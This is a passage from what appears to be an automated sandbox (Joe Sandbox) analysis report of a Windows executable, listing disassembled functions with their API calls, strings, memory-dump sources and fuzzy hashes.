                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00372663
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: d486a596dae6095ae47a71ad13bf560e819e180d795462f02f08c4c19aed6367
                                                    • Instruction ID: b4fb81fde5349564658692eb0d157a4a4ece05a9db8df0f37814cbdc9b5860d4
                                                    • Opcode Fuzzy Hash: d486a596dae6095ae47a71ad13bf560e819e180d795462f02f08c4c19aed6367
                                                    • Instruction Fuzzy Hash: CDF0A971A40115A6C72AFBA49C52FFFB76CAF19710F040A16B466672C2DBA4580D8250
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A8AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: \@>
                                                    • API String ID: 3712363035-2885639272
                                                    • Opcode ID: 0554dea70eab424658c2100d2c302436e41120ff9cbfff3aa676829a7afa1ba3
                                                    • Instruction ID: f21dbda5423b0c956b3e718c2c47bd50fec6a6b4cc6a249acf55250fda86280e
                                                    • Opcode Fuzzy Hash: 0554dea70eab424658c2100d2c302436e41120ff9cbfff3aa676829a7afa1ba3
                                                    • Instruction Fuzzy Hash: AAF05EF6940354BBE6326B61AC86FB7BA5CDB09750F000030BB08EA1D2D6B94C4093B8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036E59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: %.3d$X64
                                                    • API String ID: 481472006-1077770165
                                                    • Opcode ID: 2654026fb85fd62648cea1c7fbaeef25cfc8038629db1a327fa21a6596976fe9
                                                    • Instruction ID: 30cd19663512047a8a9b0540cafa944d5724051d6b715e903a1822a5b2c8bb0b
                                                    • Opcode Fuzzy Hash: 2654026fb85fd62648cea1c7fbaeef25cfc8038629db1a327fa21a6596976fe9
                                                    • Instruction Fuzzy Hash: FAD012B9C04028E9CB939B94E849CBD737CA719700F10C462F50791404EA34D50C9B22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A2CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A2CCB
                                                    • PostMessageW.USER32(00000000), ref: 003A2CD2
                                                      • Part of subcall function 0037F1A7: Sleep.KERNEL32 ref: 0037F21F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: dc40323ff7df382247679a169f0de88423ce1e9e26f0a014ec92d48a85113f45
                                                    • Instruction ID: 27d6abec123429dea200d49c9d3e21fe9b35e704cf86f4f41d312ecd8b51482a
                                                    • Opcode Fuzzy Hash: dc40323ff7df382247679a169f0de88423ce1e9e26f0a014ec92d48a85113f45
                                                    • Instruction Fuzzy Hash: 8ED012367C53507BF67AB770EC4FFD66A58AB56B10F800916B34BAA1D0CAE46800C798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A2C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A2C8B
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A2C9E
                                                      • Part of subcall function 0037F1A7: Sleep.KERNEL32 ref: 0037F21F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 817c65ea2c7c1e7533ec8951d0dc4facd118feaf066af059bf5113fb8bb29879
                                                    • Instruction ID: 21f60ba2a162f38392c206b53a5cebe7ad5b4556dc33f959356acf0ddeb8e03e
                                                    • Opcode Fuzzy Hash: 817c65ea2c7c1e7533ec8951d0dc4facd118feaf066af059bf5113fb8bb29879
                                                    • Instruction Fuzzy Hash: 5FD012367D4350BBF679B770EC4FFD66A58AB51B10F400916B34BAA1D0CAE46800C798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0034C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0034C233
                                                    • GetLastError.KERNEL32 ref: 0034C241
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0034C29C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: f37e898248d8753f1487b0a834ed040f40744a2de243523e98bd7b79e9144b95
                                                    • Instruction ID: a8f90e55b49a54408ebcb18ccf1a21b92d52cf9183d43b625f5d7c1e68480e08
                                                    • Opcode Fuzzy Hash: f37e898248d8753f1487b0a834ed040f40744a2de243523e98bd7b79e9144b95
                                                    • Instruction Fuzzy Hash: F3412631611206AFCF638FE5C844ABA7BE8EF01310F265569F859AF1A1DBF0AC00D760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%